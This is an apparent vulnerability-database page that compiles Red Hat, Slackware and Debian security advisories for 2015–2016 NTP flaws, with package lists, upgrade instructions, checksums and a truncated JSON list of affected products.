Synopsis: Moderate: ntp security update Advisory ID: RHSA-2016:1141-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2016:1141 Issue date: 2016-05-31 CVE Names: CVE-2015-7979 CVE-2016-1547 CVE-2016-1548 CVE-2016-1550 CVE-2016-2518 =====================================================================
- Summary:
An update for ntp is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
Security Fix(es):
-
It was found that when NTP was configured in broadcast mode, a remote attacker could broadcast packets with bad authentication to all clients. The clients, upon receiving the malformed packets, would break the association with the broadcast server, causing them to become out of sync over a longer period of time. (CVE-2015-7979)
-
A denial of service flaw was found in the way NTP handled preemptable client associations. A remote attacker could send several crypto NAK packets to a victim client, each with a spoofed source address of an existing associated peer, preventing that client from synchronizing its time. (CVE-2016-1547)
-
It was found that an ntpd client could be forced to change from basic client/server mode to the interleaved symmetric mode. A remote attacker could use a spoofed packet that, when processed by an ntpd client, would cause that client to reject all future legitimate server responses, effectively disabling time synchronization on that client. (CVE-2016-1548)
-
A flaw was found in the way NTP's libntp performed message authentication. (CVE-2016-1550)
-
An out-of-bounds access flaw was found in the way ntpd processed certain packets. An authenticated attacker could use a crafted packet to create a peer association with hmode of 7 and larger, which could potentially (although highly unlikely) cause ntpd to crash. (CVE-2016-2518)
The CVE-2016-1548 issue was discovered by Miroslav Lichvar (Red Hat).
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode 1331461 - CVE-2016-1547 ntp: crypto-NAK preemptable association denial of service 1331462 - CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets 1331464 - CVE-2016-1550 ntp: libntp message digest disclosure 1331468 - CVE-2016-2518 ntp: out-of-bounds references on crafted packet
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
ppc64: ntp-4.2.6p5-10.el6.1.ppc64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm ntpdate-4.2.6p5-10.el6.1.ppc64.rpm
s390x: ntp-4.2.6p5-10.el6.1.s390x.rpm ntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm ntpdate-4.2.6p5-10.el6.1.s390x.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm ntp-perl-4.2.6p5-10.el6.1.ppc64.rpm
s390x: ntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm ntp-perl-4.2.6p5-10.el6.1.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
ppc64: ntp-4.2.6p5-22.el7_2.2.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm ntpdate-4.2.6p5-22.el7_2.2.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7_2.2.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm ntpdate-4.2.6p5-22.el7_2.2.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7_2.2.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm ntpdate-4.2.6p5-22.el7_2.2.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm sntp-4.2.6p5-22.el7_2.2.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm sntp-4.2.6p5-22.el7_2.2.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm sntp-4.2.6p5-22.el7_2.2.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-7979 https://access.redhat.com/security/cve/CVE-2016-1547 https://access.redhat.com/security/cve/CVE-2016-1548 https://access.redhat.com/security/cve/CVE-2016-1550 https://access.redhat.com/security/cve/CVE-2016-2518 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXTUp2XlSAg2UNWIIRAqUmAKC32P98McZUqU1gzWxBbCz0hn0eagCfRtrx SULnKXrtTJd5iJ6eQVtDnxA= =hETy -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. This release patches several low and medium severity security issues: CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering CVE-2016-1549: Sybil vulnerability: ephemeral association attack, AKA: ntp-sybil - MITIGATION ONLY CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion botch CVE-2016-2517: Remote configuration trustedkey/requestkey values are not properly validated CVE-2016-2518: Crafted addpeer with hmode > 7 causes array wraparound with MATCH_ASSOC CVE-2016-2519: ctl_getitem() return value not always checked CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos CVE-2016-1548: Interleave-pivot - MITIGATION ONLY CVE-2015-7704: KoD fix: peer associations were broken by the fix for NtpBug2901, AKA: Symmetric active/passive mode is broken CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks CVE-2016-1550: Improve NTP security against buffer comparison timing attacks, authdecrypt-timing, AKA: authdecrypt-timing For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz
Slackware 13.1 package: dfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz
Slackware 13.37 package: e760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: aa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz
Slackware 14.1 package: dbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz
Slackware -current package: 4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz
Slackware x86_64 -current package: 7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-7977 / CVE-2015-7978
Stephen Gray discovered that a NULL pointer dereference and a
buffer overflow in the handling of "ntpdc reslist" commands may
result in denial of service.
CVE-2016-2518
Yihan Lian discovered that an OOB memory access could potentially
crash ntpd.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u2.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p7+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p7+dfsg-1.
We recommend that you upgrade your ntp packages
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-1136", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.9, "vendor": "ntp", "version": "4.2.8" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "lte", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p4 and earlier" }, { "model": "ntp", "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.20" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.7" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3210" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "network device security assessment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "linux", "scope": "eq", 